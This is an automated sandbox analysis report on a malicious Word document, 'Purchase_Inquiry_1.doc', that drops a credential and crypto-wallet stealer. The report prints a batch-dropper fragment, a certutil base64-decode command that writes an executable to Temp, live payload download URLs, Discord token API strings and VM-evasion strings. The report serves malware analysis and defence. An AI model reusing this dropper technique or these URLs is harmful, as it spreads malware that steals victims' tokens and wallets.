          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX (10 identical entries)
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 936
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 1449
Source: C:\Windows\SysWOW64\certutil.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe
Source: C:\Windows\SysWOW64\cmd.exe TID: 7792 Thread sleep count: 936 > 30
Source: C:\Windows\SysWOW64\cmd.exe TID: 7792 Thread sleep count: 1449 > 30
Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxtray
Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxservice
Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: qemu-ga
Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareuser
Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmusrvc
Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareservice+discordtokenprotector
Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmsrvc
Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmtoolsd
Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwaretray
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation

          Stealing of Sensitive Information

Source: certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: BytecoinJaxx!com.liberty.jaxx
Source: certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Exodus
Source: certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: Yara match File source: 14.2.certutil.exe.910a78.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.certutil.exe.910a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: certutil.exe PID: 7756, type: MEMORYSTR
ATT&CK tactic matrix (one line per tactic column; cells are listed top to bottom, and digits preceding a technique name are the report's count badges for that technique):
Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties
Resource Development: 421 Scripting | Domains | DNS Server | Virtual Private Server | Server | Botnet
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media
Execution: 23 Exploitation for Client Execution | Scheduled Task/Job | At | Cron | Launchd | Scheduled Task
Persistence: 421 Scripting | 1 DLL Side-Loading | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts
Privilege Escalation: 11 Process Injection | 1 DLL Side-Loading | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts
Defense Evasion: 1 Masquerading | 1 Disable or Modify Tools | 1 Virtualization/Sandbox Evasion | 11 Process Injection | 1 Timestomp | 1 DLL Side-Loading
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials
Discovery: 1 Security Software Discovery | 1 Virtualization/Sandbox Evasion | 1 Process Discovery | 1 Application Window Discovery | 1 File and Directory Discovery | 12 System Information Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC
Collection: 1 Data from Local System | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture
Command and Control: 2 Ingress Tool Transfer | 3 Non-Application Layer Protocol | 113 Application Layer Protocol | Protocol Impersonation | Fallback Channels | Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop
Antivirus detection of the submitted sample (Source | Detection | Scanner | Label):
Purchase_Inquiry_1.doc | 53% | Virustotal |
Purchase_Inquiry_1.doc | 47% | ReversingLabs | Script-Macro.Trojan.Jeki
Purchase_Inquiry_1.doc | 100% | Avira | HEUR/Macro.Downloader.ARJJ.Gen
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
URL detection (Source | Detection | Scanner | Label):
http://portalsphere.free.fr/phUploader/uploads/1741130958.zip | 0% | Avira URL Cloud | safe
http://portalsphere.free.fr/phUploader/uploads/1741111253.zip | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
perso154-g5.free.fr | 212.27.63.154 | true | false | | high
s-0005.dual-s-dc-msedge.net | 52.123.131.14 | true | false | | high
portalsphere.free.fr | unknown | unknown | true | | unknown
URLs (Name | Malicious | Antivirus Detection | Reputation):
http://portalsphere.free.fr/phUploader/uploads/1741130958.zip | true | Avira URL Cloud: safe | unknown
URLs found in memory and dropped files (Name | Source | Malicious | Antivirus Detection | Reputation):
https://discord.com/api/v10/users/ | certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://portalsphere.free.fr/phUploader/uploads/1741111253.zip | Purchase_Inquiry_1.doc | false | Avira URL Cloud: safe | unknown
http://ip-api.com/json/?fie | certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, i19ag96bvk.exe.13.dr | false | | high
http://ip-api.com/json/?fields=225545 | certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806- | certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, i19ag96bvk.exe.13.dr | false | | high
https://discordapp.com/api/v9/users/ | certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/PyDevOG/Divulge-Stealer | certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp | false | | high
IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
212.27.63.154 | perso154-g5.free.fr | France | 12322 | PROXADFR | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1628942
Start date and time: 2025-03-04 09:49:19 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Purchase_Inquiry_1.doc
Detection: MAL
Classification: mal100.spyw.expl.winDOC@18/10@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.109.89.19, 13.89.179.9, 23.60.203.209, 2.21.65.149, 2.21.65.130, 52.111.236.33, 52.111.236.34, 52.111.236.32, 52.111.236.35, 52.123.131.14, 13.107.253.72, 40.126.31.131, 172.202.163.200
                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, weu-azsc-000.roaming.officeapps.live.com, weu-azsc-config.officeapps.live.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, roaming.officeapps.live.com, onedscolprdcus09.centralus.cloudapp.azure.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, dual-s-0005-office.config.skype.com, ocsp.digicert.com, login.live.com, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, e26769.dscb.akamaiedge.net, nleditor.osi.office.net,
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            No simulations
                            No context
Context for s-0005.dual-s-dc-msedge.net (Associated Sample Name / URL | Detection | Threat Name | Context):
https://onedrive.live.com/redir?resid=5BFC62F3074C4120%21116&authkey=%21AOd_yBhC51KgUHc&page=View&wd=target%28Quick%20Notes.one%7C3c69d085-3af0-472e-a78d-4a68e797d5be%2FLOEB%7C8799eb25-cf12-4e70-a243-200cc3374b83%2F%29&wdorigin=NavigationUrl | malicious | Unknown | 52.123.130.14
SWIFTXCOPYXXMT103XXUSD17,145.docx | malicious | Unknown | 52.123.131.14
PurchaseXOrder.docx | malicious | Unknown | 52.123.131.14
refACH Notice of Automatic Transaction Report For INV1475472784Attn-rockwool.com..msg | malicious | Unknown | 52.123.130.14
2cd5eb33-2162-4691-6d74-1d8137a5ac49.eml | malicious | HTMLPhisher | 52.123.131.14
2cd5eb33-2162-4691-6d74-1d8137a5ac49.eml | malicious | HTMLPhisher | 52.123.130.14
TR Swisslife Request for Timely Document Review and Approval.msg | malicious | Unknown | 52.123.131.14
SecuriteInfo.com.Other.Malware-gen.10169.30262.xlsx | malicious | Unknown | 52.123.130.14
SecuriteInfo.com.Other.Malware-gen.10169.30262.xlsx | malicious | Unknown | 52.123.130.14
Untitled attachment 00010.eml (3.51 KB).msg | malicious | Unknown | 52.123.131.14
Context for ASN PROXADFR (Associated Sample Name / URL | Detection | Threat Name | Context):
splppc.elf | malicious | Unknown | 78.198.33.245
nklsh4.elf | malicious | Unknown | 88.188.210.4
splarm7.elf | malicious | Unknown | 78.246.139.129
nabx86.elf | malicious | Unknown | 88.122.45.125
nklarm7.elf | malicious | Unknown | 78.215.107.251
jklppc.elf | malicious | Unknown | 88.173.191.176
jklarm5.elf | malicious | Unknown | 78.244.124.191
jklarm7.elf | malicious | Unknown | 88.165.176.171
mips.elf | malicious | Unknown | 82.67.172.0
arm7.elf | malicious | Mirai, Moobot | 88.189.112.253
                            No context
                            No context
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):95084
                            Entropy (8bit):7.9910562897314605
                            Encrypted:true
                            SSDEEP:1536:0QW7rM56cylgl/x/zWEGysB7Yk0etudvjah0vtJ2ZDt2COYtPjT2OGBboZvu9U:0QW7rM8cyCz1oBD0egdW0v2ZBXO4P2oN
                            MD5:39F32727AE03493E3B5ED9A882D1B48A
                            SHA1:496EE5227A858ABDE2A8358EDA1B2A37730A7E6A
                            SHA-256:4B8A741A38ECDD6E604345DEED59C8E7F13C5979C1BC7E909B513F80EF83A890
                            SHA-512:362A7DFB3C7D12F31FC23EBFD40C9B5DD65BDA70C16C96FC54238787B26A0888D7F2518CE39DFF1C169A0325B757E8F36A0C17317C49A5B3B33CBB7FCD685FA0
                            Malicious:false
                            Reputation:low
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:DOS batch file, ASCII text, with very long lines (821), with CRLF line terminators
                            Category:dropped
                            Size (bytes):261492
                            Entropy (8bit):5.090735612404722
                            Encrypted:false
                            SSDEEP:6144:IcgHPD6A9e2WvzTA7R6EteCwHNLVI589agH:tChHWN0M
                            MD5:0FD197505E772316F09B32E339138183
                            SHA1:A73FFDFC68AC6BA74E7BA99FB80DEC36160A03A2
                            SHA-256:2E09CBDD78C3B2C3F21A16FC59E3CF1071C353E78AB50797EF9AA980AF023DE6
                            SHA-512:6993604010A28A51C2A62B4D66EB3BC5C9549C0C9B9A4E0FEF091980E8CF888494831E9871DBCDCEB033004C072B093A31CA2073F51F26FA0D8E2B887F460D41
                            Malicious:true
                            Reputation:low
                             Preview:@echo off..setlocal enableextensions enabledelayedexpansion..set TEMPBASE64=%TEMP%\i19ag96bvk.txt..set TEMPEXE=%TEMP%\i19ag96bvk.exe..echo ... > %TEMPBASE64%..echo AAAAAB2NAgAAASXQVAQABCgBAAAKgA8AAAR+DwA
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):95084
                            Entropy (8bit):7.9910562897314605
                            Encrypted:true
                            SSDEEP:1536:0QW7rM56cylgl/x/zWEGysB7Yk0etudvjah0vtJ2ZDt2COYtPjT2OGBboZvu9U:0QW7rM8cyCz1oBD0egdW0v2ZBXO4P2oN
                            MD5:39F32727AE03493E3B5ED9A882D1B48A
                            SHA1:496EE5227A858ABDE2A8358EDA1B2A37730A7E6A
                            SHA-256:4B8A741A38ECDD6E604345DEED59C8E7F13C5979C1BC7E909B513F80EF83A890
                            SHA-512:362A7DFB3C7D12F31FC23EBFD40C9B5DD65BDA70C16C96FC54238787B26A0888D7F2518CE39DFF1C169A0325B757E8F36A0C17317C49A5B3B33CBB7FCD685FA0
                            Malicious:true
                            Reputation:low
                            Process:C:\Windows\SysWOW64\certutil.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):112800
                            Entropy (8bit):5.615863694373274
                            Encrypted:false
                            SSDEEP:3072:z+AIE6iee4xc7I+g4A9PtLmMf8noNM3MWQ/s17LVHEEPX9p8lt1WkXB0A0srT8bU:zGE6iee4xUZA9Pt6Mf8noNM3MWQ/s17i
                            MD5:D47A213067F10E02D83A325926E98509
                            SHA1:B87F47688C383DC59C8F9170C11101626C472B22
                            SHA-256:FA5FA37C1008B41C890048B0FAC4F81CFC024F21DC7D76485CC276CF0729CF0C
                            SHA-512:798D91FD338DACAFF118DB74FDA8578D78D588969CD72C1F3451A9A992093202D1B63ECA6F6F8847849EF74310902473C3B6F4F321BEB36678E0304D597111AC
                            Malicious:true
                            Process:C:\Windows\SysWOW64\cmd.exe
                            File Type:ASCII text, with very long lines (801), with CRLF line terminators
                            Category:modified
                            Size (bytes):275784
                            Entropy (8bit):5.0634311208907565
                            Encrypted:false
                            SSDEEP:6144:sco91DkeTvWgGcG2qVSpR6ElmYO5xFVuDKxG0l:Xb21H96xEG
                            MD5:54CD951E2141FC195D3E64821221A6EC
                            SHA1:A9CE0126BA12AEFF02EE8F9A5CFB00F27EE1F23D
                            SHA-256:66EC90DDCAE0DA893211ADBF2AAD7DB61838429AA497D2E00265D807848343AD
                            SHA-512:17680B39B7008E409068FFFB83355423EE2DDA0BA0E83FAED8A97E216962970AC3E482B539E93DFC091EB9382AF9C8F9ACAF6521641FB1DB1883A363081F249D
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):162
                            Entropy (8bit):2.5890785841313306
                            Encrypted:false
                            SSDEEP:3:C1ClXLlAT7x1AqQEmdlfllzi+eaaaH/C:blYYqQrW+Faaa
                            MD5:3C6AAA28041FB1D7A3BE861A4BC12A3E
                            SHA1:F173DAE9680716659C1FE7E5290412F063D1940A
                            SHA-256:3DE10B4FC3C9A3F17C54992D0AA76FF1E8EF9523B045944084CAC38757381F60
                            SHA-512:D4E8774564451010E2CB2D9A3CD483DED6EAE4730A291D168C89229D99C012B92D42E791731DA3E1AB07604ABC64BF4F8C9381D852C7A33780F44A9BF9200446
                            Malicious:false
                            Process:C:\Windows\SysWOW64\certutil.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):208
                            Entropy (8bit):5.207588895793622
                            Encrypted:false
                            SSDEEP:3:qOYFXSQuRo4Z2xKj5XLMxNG4qX6XtXFg337jsV4sD3GqRF8jxd1ELzKVJ6XtXFgy:q3EoFi+xTqXia3cmYgxILaia3cmYhP
                            MD5:D5D6B64267913051294188E962EA1DC8
                            SHA1:FB7BF4DBADBE0389C272045930FE7DD20A1A56C2
                            SHA-256:B15B064779C9F842FFFBB86F4D9E10C06ED1198FDD8D752604640C9DEFBB194F
                            SHA-512:37CCA692A3D4EEEA8ACC06CB33061AEE8180160A49042C0376945AF4E66BA3E19F4DCAC1A3C8C496D939F75F309161F9ED4E0A54B3ABE843EDB7A9BD5DBB0759
                            Malicious:false
                            Preview:Input Length = 275784..EncodeToFile returned The file exists. 0x80070050 (WIN32: 80 ERROR_FILE_EXISTS)..CertUtil: -decode command FAILED: 0x80070050 (WIN32: 80 ERROR_FILE_EXISTS)..CertUtil: The file exists...
                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: USER, Template: Normal.dotm, Last Saved By: USER, Revision Number: 9, Name of Creating Application: Microsoft Office Word, Total Editing Time: 22:00, Create Time/Date: Thu Jan 2 11:13:00 2025, Last Saved Time/Date: Mon Mar 3 20:04:00 2025, Number of Pages: 1, Number of Words: 20, Number of Characters: 118, Security: 0
                            Entropy (8bit):3.9394413598612568
                            TrID:
                            • Microsoft Word document (32009/1) 54.23%
                            • Microsoft Word document (old ver.) (19008/1) 32.20%
                            • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                            File name:Purchase_Inquiry_1.doc
                            File size:46'592 bytes
                            MD5:a9bddd4272a1020b5b36be097f8a80f8
                            SHA1:5b7368f5a8b040dfdccfd6421f5d1e823aceb65a
                            SHA256:25dceeb01ea833d9dfd54c933f7c0f019079e86db670af3e2171c31e730dbe77
                            SHA512:6e6faa21546f913be6260428b3c30d0a3c46ee9131baf2e8c1e4f966233c3fe4473e6417f01697cab79d1378c88dabecff8594171a3e51e5c8595c815c02c026
                            SSDEEP:384:vxT7+46+r8E8iSwvxjk+tAD6WzWK8NrOerMKGMReH6EA0jGvYP/qtT3/BlRb:v4OAqxw+tRof8NmvyZQU
